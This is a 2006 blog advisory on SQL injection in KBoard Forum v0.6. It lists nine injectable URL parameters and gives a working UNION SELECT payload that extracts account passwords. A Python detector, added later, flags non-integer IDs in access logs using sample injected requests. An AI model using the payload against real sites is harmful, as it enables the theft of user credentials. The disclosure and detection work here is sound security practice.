Thursday, September 28, 2006

KBoard v0.6 Sql Injection

#######################################
+Advisory #1
+KBoard v0.6 Sql Injection
+Product : KBoard Forum v0.6
+Develop : http://sourceforge.net/project/showfiles.php?group_id=92748
+Class: SQL injection
+Risk: High
+Discovered by: Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa;)
########################################
~Auth:

Examples:
--------
index.php?id='[SQL]
user_posthistory.php?search_id='[SQL]
user_profile.php?id='[SQL]
forum_threadlist.php?forum_id='[SQL]
post_thread.php?forum_id='[SQL]
thread_view.php?thread_id='[SQL]
thread_view.php?forum_id='[SQL]
addressbook_add.php?id='[SQL]
account_edit.php?accountselected=1&aid='[SQL]


Vulnerable:

http://site/path/index.php?id=991199'UNION SELECT id,id,password,password,sig,id FROM accounts/*
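
Detection sketch for the parameters listed above (an added example, not part of the original advisory or of KBoard): it scans web access log lines for requests to the listed scripts whose ID parameters carry anything other than digits. It assumes these parameters are meant to be integer IDs and that the log is in combined format; the sample log lines, the /kboard/ path and search.php are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> ID parameters named in the advisory.
KBOARD_PARAMS = {
    "index.php": {"id"},
    "user_posthistory.php": {"search_id"},
    "user_profile.php": {"id"},
    "forum_threadlist.php": {"forum_id"},
    "post_thread.php": {"forum_id"},
    "thread_view.php": {"thread_id", "forum_id"},
    "addressbook_add.php": {"id"},
    "account_edit.php": {"aid"},
}

# Request target of an access log entry; non-greedy so raw spaces survive.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]+")  # assumption: valid IDs are plain integers


def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for non-integer IDs."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        watched = KBOARD_PARAMS.get(script, ())
        for name, value in parse_qsl(url.query):  # percent-decodes values
            if name in watched and not INT_RE.fullmatch(value):
                hits.append((line_no, script, name, value))
    return hits


# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Sep/2006:10:00:01 +0000] "GET /kboard/thread_view.php?thread_id=12&forum_id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Sep/2006:10:00:09 +0000] "GET /kboard/thread_view.php?thread_id=12%27 HTTP/1.1" 200 312',
    '192.0.2.44 - - [28/Sep/2006:10:00:15 +0000] "GET /kboard/index.php?id=991199\'[SQL] HTTP/1.1" 200 298',
    '192.0.2.10 - - [28/Sep/2006:10:00:20 +0000] "GET /kboard/account_edit.php?accountselected=1&aid=4 HTTP/1.1" 200 2210',
    '192.0.2.10 - - [28/Sep/2006:10:00:31 +0000] "GET /kboard/search.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("line %d: %s %s=%r" % hit)
```

Only query-string parameters are visible in an access log; values submitted in POST bodies need application-level or WAF logging to be checked the same way.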
